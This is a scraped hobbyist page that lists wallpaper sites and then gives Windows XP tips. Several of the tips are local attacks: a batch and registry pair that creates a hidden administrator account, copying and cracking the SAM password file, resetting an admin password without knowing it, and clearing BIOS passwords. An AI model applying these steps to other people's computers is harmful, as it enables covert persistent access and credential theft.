www.animewallpapers.com/game
www.game-walls.com
www.gamersgallery.com
www.bestgamewallpapers.com
www.gamewallpapers.com
www.wallpapervillage.com
www.daeya.com
www.boyis.com
gallery of XP wallpapers
http://gallery-0bz9htixouezk6.usercash.com/
www.themexp.org
www.fantom-xp.com
www.wallpaperseek.com/
Vista wallpaper
www.vistawallpaper.com
www.vistawallpapers.com
www.vistawallpaper.org
www.vistawallpaperarchive.com
www.hamaddarwish.com
www.vista-tips.net

Windows tips 2

How to create hidden Admin Account on windows???
This batch (*.bat) file can be used to create an administrator account called "USER" with a password of "PASS" (Add the following text to a new file and give it a .bat extension:
@echo off
net user USER PASS /add
net localgroup Administrators USER /add
Now we need to make a registry entry fil that will cause an account with "USER" as the username to be hidden from the Welcome Screen and in most cases also hidden from the basic User Accounts settings windows... found in the control panel: place the following text in a file with a .reg extension.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Winlogon\SpecialAccounts\UserList]
"USER"=dword:00000000
Now, from the welcome screen in windows xp, press and hold Ctrl-Alt-
Delete to manually type in a desired username and password (eg. to log
into a hidden account)

Quick Encryption for Windows XP
What is encryption? Encryption is the process of converting data into a format that cannot be read by others. Windows XP can automatically encrypt your data when it is stored on the hard disk.
To encrypt your folder in Windows XP, all you have to do is right click the folder that you want to encrypt and choose the properties, then advance option, but that was the standard method the steps bellow will involve tweaking the registry so that the moment you right click the folder you want to encrypt you can immediately see it as part of the menu .
1.Open Registry Editor: Click start | Click Run… | Type regedit | Press Enter
2.Navigate to the following key (if it doesn’t exist, create it): HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
3.Look for a DWORD value called EncryptionContextMenu (if it doesn’t exist, create it).
4.Change its value data to 1.
5.Click OK and close the Registry Editor.
NOTE :
1.This hack is not applicable to Microsoft Windows XP Home Edition
2.Windows registry is a crucial part of your system and messing around with it is dangerous.
Follow instructions carefully.
Cracking Windows Logon Password
Cracking Windows Logon Password.(Hacking SAM file) Windows NT/2000/XP/2003
SAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.
-What are password Hashes?
Actually when we enter password in Windows Logon Tab, Windows encrypts our password using an encryption scheme that turns our password into something that looks like this:
65464564s1d4d2c9a56s42166d55se
SAM file can be found under C:(default OS drive) -> WINNT -> System32 -> Config -> SAM.
SAM file can be cracked by sing a simple freeware software "SAMInside".
Troubleshooting : While copying SAM file it shows an error of "Access Denied" or "File in Use". Actually copying of SAM file is restricted by Windows.
There are many alternatives to copy SAM file.
[1] You can boot your system by a Live Linux CD such as Knnopix or Fedora. Linux has access to all Windows Files. This way SAM file can be easily copied.
How to login as Administrator in Windows XP?
The built-in Administrator account is hidden from Welcome Screen when a user account with Administrator privileges exists and enabled. In Windows XP Home Edition, you can login as built-in Administrator in Safe Mode only. For XP Professional, press CTRL + ALT + DEL twice at the Welcome Screen and input your Administrator password in the classic logon window that appears. To have the Administrator account display in the Welcome Screen, try any of these two methods:
Method 1:
Using TweakUI Power Toy for Windows XP
Open TweakUI and click "Logon" option in the left pane. Put a checkmark against the option "Show Administrator on Welcome Screen". Click OK to close TweakUI. Logoff and see if Welcome Screen lists Administrator login. Changes are immediate and you can use the Winkey + L to switch back to Welcome Screen to see Administrator account is listed. Use this procedure to hide/unhide any user account from the Welcome Screen. Please remember, you can still login to a hidden account using CTRL+ALT+DEL classic logon method, but cannot Fast User Switch to a hidden user account.
Method 2 - Manual registry edit
*Click Start, Run and type Regedit.exe
*Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
1.Use the File, Export option to backup the key.
2.Right-click in the right pane and select New DWORD Value.
3.Type-in Administrator as the value.
4.Double-click Administrator, and assign a value of 1
5.Close Regedit
You may use this procedure to hide/show users in the Welcome Screen for any user account. Type the account name accordingly in step 5.
For Windows XP Home Edition: While you can configure Windows XP Home Edition to show Administrator account in the Welcome Screen, you cannot login as Administrator in Normal mode. Boot into Safe Mode to login as Administrator.
How to take ownership of a file or folder in XP
When you access a file or a folder in your system, you may receive an error "Access Denied", which indicates that you don't have permissions to access that folder or the file. Typical scenario where the error is seen is after you reinstall Windows XP and try to access your old profile. If you are an Administrator (or Administrator-level User account) and want to access the contents of the folder, you can take Ownership of that folder or the file. Prerequisites for taking ownership of a file or a folder
1. You must be logged on to the computer with an account that has administrative privileges.
2.If you are running Microsoft Windows XP Home Edition, you must start the computer in safe mode, and then log on with an account that has Administrative rights to have access to the Security tab. To start Windows XP in Safe Mode, see article Start Windows XP in Safe Mode
3.For Microsoft Windows XP Professional, you need to disable Simple File Sharing, in order to see the Security tab. To disable simple file sharing, follow these steps: Click Start, and then click My Computer. On the Tools menu, click Folder Options, and then click the View tab. In the Advanced Settings section, clear the Use simple file sharing (Recommended) check box. Click OK.
To take ownership of a folder, follow these steps:
1.Right-click the folder that you want to take ownership of, and then click Properties.
2.Click the Security tab, and then click OK on the Security message (if one appears).
3.Click Advanced, and then click the Owner tab.
4.In the Name list, click your user name, or click Administrator if you are logged in as Administrator, or click the Administrators group. If you want to take ownership of the contents of that folder, select the Replace owner on subcontainers and objects check box.
5.Click OK, and then click Yes when you receive the following message:
You do not have permission to read the contents of directory folder name. Do you want to replace the directory permissions with permissions granting you Full Control?
All permissions will be replaced if you press Yes.
where folder name is the name of the folder that you want to take ownership of.
6.Click OK, and then reapply the permissions and security settings that you want for the folder and its contents.
To take ownership of a file, follow these steps
1.Right-click the file that you want to take ownership of, and then click Properties.
2.Click the Security tab, and then click OK on the Security message (if one appears).
3.Click Advanced, and then click the Owner tab.
4.In the Name list, click Administrator, or click the Administrators group, and then click OK.
The administrator or the Administrators group now owns the file.
Hacking Password
1. Open command prompt (Start->Run->cmd),
2. Enter the following command, then press ENTER
3. Enter the followin command, then press ENTER:
compmgmt.msc
This should open the computer management console.
4. Go to local users & groups->users. Right click on any user and select "set password".
If you get a "access denied" do the following:
start>run>cmd
then use following commands
1) net user test /add (this command will make test named user)
2) net localgroup administrators test /add (this command will make test user as administrators rights)
and use net user command to reset your admin. Password
Alternative
What if u don't know the password of your admin and still want to hack and change .. yea u can do it ..in a very easy manner.. check this. just follow the steps.. this doesn't require u to know the admin password but still u can change it..
Start >> Run >> [type]cmd // this will open your command prompt
[type] net(space)user(press enter)
[type] net(space)user(space)[windowsloginid](sp ace)*(press enter)
// for e.g. : net user HOME *(press enter)
[type] new password (press enter) and retype it (press enter).. it will show u confirmation... // caution it wont show u the password u type.. but it still types.. the blinking pointer will b there at the same place.. but it still works..
// for e.g. : password changed successfully.
BIOS Passwords Hacks.
To perform this hack you will need:
A #1 or #2 Phillips-head screwdriver, or (less likely) a T-15 TORX driver or a 1/4" hex nutdriver, to open the case
Needle-nosed pliers if you are working with jumpers
A small flashlight or headlamp
With tools at hand, perform the following steps:
1.Turn the PC off (this means a total shutdown, not merely standby or hibernate mode) and disconnect the AC power cord.
2.Remove the cover from your system (this step may require tools, undoing a thumbscrew, or flipping a latch or two).
3.Refer to the user manual for the motherboard to find out how to "reset CMOS" memory. You may also find a label for specific jumper or switch settings marked on the system board.
4.Change the switch setting or jumper position to a specific position or remove the jumper entirely as prescribed in the manual to clear or reset the CMOS memory.
5.Wait 20-30 seconds for the memory to clear out from lack of power.
6.After 20-30 seconds put the switch or jumper the way it was before for normal use.
7.Reconnect the power cord and start up the system to see if the settings have changed to defaults.
8.Shut the PC down, disconnect the power cord, replace the cover, reconnect the power, and power up the PC.
9.Enter the BIOS setup program to configure the system as needed. This may include setting the date and time, selecting disk drive parameters, and selecting which devices the system uses to boot up with first.
If your system does not have a "reset CMOS" jumper or switch , the only option is to locate and remove the coin-style battery cell (or on some very old PCs, the battery pack), as shown in , that provides the power to the CMOS memory.
Make Invisible Folders!!
KEEP FOLDERS HIDDEN (Without any External Application)
Just go through the steps below..then u can make a hidden folder to keep all your data SAFE!
1. First create a new folder somewhere on your hard drive
when you name it hold down "Alt" and press "0160" this will create and invisible space so it will apper as if it has no name.
2. Then right click in and select "Properties" select the tab "coustimize" and select "change icon" scroll along and you should a few blanc spaces click on any one and click OK
when you hav saved the settings the folder will be invisible to hide all your personal files. You just have to remember the folders location in your hard drive..